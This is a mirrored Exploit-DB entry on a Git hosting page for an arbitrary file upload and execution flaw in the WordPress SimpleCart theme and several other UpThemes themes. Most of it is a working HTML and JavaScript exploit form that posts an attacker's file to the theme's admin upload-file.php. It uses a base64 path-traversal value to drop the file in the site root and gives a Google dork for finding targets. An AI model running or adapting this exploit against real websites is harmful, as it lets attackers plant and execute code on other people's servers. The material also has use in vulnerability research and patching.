bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/36611.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

56 lines
No EOL
2.4 KiB
Text
Raw Blame History

# Exploit Title: Wordpress SimpleCart Theme File Upload and Execution
# Google Dork: inurl:/wp-content/themes/simplecart
# Date: 31 March 2015
# Exploit Author: Divya
# Vendor Homepage: https://github.com/UpThemes/
# Software Link: https://github.com/UpThemes/SimpleCart-Theme
# Version: 2.1.2
# Tested on: Windows, Linux
# CVE : None
#
# Other Themes:
# Micro Theme 1.0.3: https://github.com/UpThemes/Micro-Theme
# Holding Pattern Theme 1.3: https://github.com/UpThemes/Holding-Pattern-Theme
# Gallery Pro Theme 2.5.3: https://github.com/UpThemes/Gallery-Pro-Theme/
# Evo Theme 1.3: https://github.com/UpThemes/Evo-Theme
# Charity Theme 1.1.3: https://github.com/UpThemes/Charity-Theme/
<html>
<head>
<title>WP Theme Exploit</title>
<script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/md5.js"></script>
<script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/components/enc-base64-min.js"></script>
<script>
function process_data()
{
var proto = "http://";
if (document.getElementById('rb1').checked)
{
proto = document.getElementById('rb1').value;
}
var targetip = document.getElementById('targetip').value;
var filepath = document.getElementById('vfile').value;
var formaction = proto.concat(targetip,filepath);
document.getElementById("myform").setAttribute("action", formaction);
document.getElementById("file1").setAttribute("name", CryptoJS.MD5(document.getElementById('targetip').value));
return true;
}
</script>
</head>
<body>
<form id="myform" name="myform" action="#" method="post" enctype="multipart/form-data">
Target IP: <input type="text" id="targetip" name="targetip">
<input type="radio" id="rb1" name="rb1" value="http://" checked>HTTP
<input type="radio" id="rb1" name="rb1" value="https://">HTTPS <br>
Upload File: <input type="file" id="file1" name="n1"><br> <!--name="00958fd0af98291fdf517e3fe763da5c"-->
Upload Path: <input type="text" id="upload_path" name="upload_path" value="Li4vLi4vLi4vLi4v"><br><br>
<fieldset>
<legend>Base64 Encoded value (without double quotes)</legend>
1. "Li4vLi4vLi4vLi4v" for website root directory upload.<br>
2. "Lg==" for current directory upload.<br>
</fieldset><br>
Vulnerable File: <input type="text" id="vfile" name="vfile" value="/wp-content/themes/simplecart/admin/upload-file.php" size="100%"><br><br>
<input type="submit" value="Exploit" onClick="process_data()">
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink